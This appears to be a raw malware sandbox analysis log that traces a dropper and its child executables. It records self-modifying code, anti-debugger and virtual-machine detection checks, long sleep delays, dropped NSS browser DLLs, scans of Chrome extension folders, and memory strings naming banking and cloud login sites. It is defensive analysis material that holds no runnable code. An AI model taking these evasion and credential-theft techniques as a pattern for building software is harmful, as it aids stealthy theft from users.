Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: 60BDCA3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: 60BE05E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: 60BC734 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: 5F1B172 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: 60E5A72 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: 60D0E24 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: 614859B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Special instruction interceptor: First address: A50F9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: 669DAB9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: 683DCA3 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: 683E05E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: 683C734 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: 669B172 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: 6865A72 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: 6850E24 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Special instruction interceptor: First address: 68C859B instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Memory allocated: 4C20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Memory allocated: 4E40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Memory allocated: 4C80000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_053708D0 rdtsc

0_2_053708D0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 2200	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 2180	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 699	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 763	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window / User API: threadDelayed 1171	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window / User API: threadDelayed 1158	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window / User API: threadDelayed 1148	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window / User API: threadDelayed 1164	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Window / User API: threadDelayed 1141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Window / User API: threadDelayed 1272

Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Dropped PE file which has not been started: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7624	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7624	Thread sleep time: -66033s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7608	Thread sleep count: 2200 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7608	Thread sleep time: -4402200s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7604	Thread sleep count: 2180 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7604	Thread sleep time: -4362180s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7580	Thread sleep count: 232 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7580	Thread sleep time: -6960000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7600	Thread sleep count: 699 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7600	Thread sleep time: -1398699s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7612	Thread sleep count: 763 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7612	Thread sleep time: -1526763s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7696	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7604	Thread sleep time: -54027s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 7928	Thread sleep count: 1171 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 7928	Thread sleep time: -2343171s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 7932	Thread sleep count: 1158 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 7932	Thread sleep time: -2317158s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 8004	Thread sleep time: -36000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 8012	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 7936	Thread sleep count: 1148 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 7936	Thread sleep time: -2297148s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 7908	Thread sleep count: 1164 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 7908	Thread sleep time: -2329164s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 8548	Thread sleep count: 97 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 8548	Thread sleep time: -582000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 7912	Thread sleep count: 1141 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 7912	Thread sleep time: -2283141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe TID: 8112	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 5264	Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 5264	Thread sleep time: -68034s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 5404	Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 6428	Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 6428	Thread sleep time: -76038s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 4284	Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 1996	Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 1996	Thread sleep time: -74037s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 6220	Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 3060	Thread sleep count: 40 > 30
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 3060	Thread sleep time: -80040s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 5744	Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 5744	Thread sleep time: -76038s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 4120	Thread sleep count: 45 > 30
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 4120	Thread sleep time: -90045s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 5644	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 5644	Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 2576	Thread sleep count: 44 > 30
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 2576	Thread sleep time: -88044s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 7192	Thread sleep count: 47 > 30
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 7192	Thread sleep time: -94047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 7260	Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 7268	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 3576	Thread sleep count: 46 > 30
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 3576	Thread sleep time: -92046s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 2608	Thread sleep count: 101 > 30
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 2608	Thread sleep time: -606000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 5268	Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 5268	Thread sleep time: -62031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 5820	Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 4672	Thread sleep time: -50025s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 6300	Thread sleep time: -46023s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 6536	Thread sleep count: 262 > 30
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe TID: 6536	Thread sleep time: -1572000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe TID: 8276	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 5856	Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 5492	Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 8380	Thread sleep time: -270000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 4036	Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe TID: 9520	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe

Thread sleep count: Count: 1272 delay: -10

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B1C9C7 FindFirstFileExW,		7_2_00B1C9C7
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Code function: 7_2_00B1CA78 FindFirstFileExW,FindNextFileW,FindClose,FindClose,		7_2_00B1CA78

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Source: skotes.exe, skotes.exe, 00000003.00000002.2246461031.0000000000D1B000.00000040.00000001.01000000.00000007.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3552801155.0000000000F7F000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2220252343.0000000001548000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\U
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: pisos23.exe, 0000000A.00000003.3098052157.000000000343C000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000002.3121196586.000000000343C000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000002.3113659391.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, pisos23.exe, 0000000A.00000003.3094450003.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001681000.00000004.00000020.00020000.00000000.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.0000000001651000.00000004.00000020.00020000.00000000.sdmp, 3e169c0a7e.exe, 0000000F.00000003.3026864104.00000000013A2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3194860072.000001B627660000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3194860072.000001B6276BC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: firefox.exe, 0000001D.00000002.3248030030.000001B6316BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B34000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: 7fb3e2a1d2.exe, 0000000E.00000002.3556235147.000000000160E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2217527097.0000000000ABB000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2245520457.0000000000D1B000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2246461031.0000000000D1B000.00000040.00000001.01000000.00000007.sdmp, 7fb3e2a1d2.exe, 0000000E.00000002.3552801155.0000000000F7F000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 3e169c0a7e.exe, 0000000F.00000003.3056426090.0000000005B27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_2-10613
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_2-10652
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_3-10650
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node	graph_3-10611

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Thread information set: HideFromDebugger
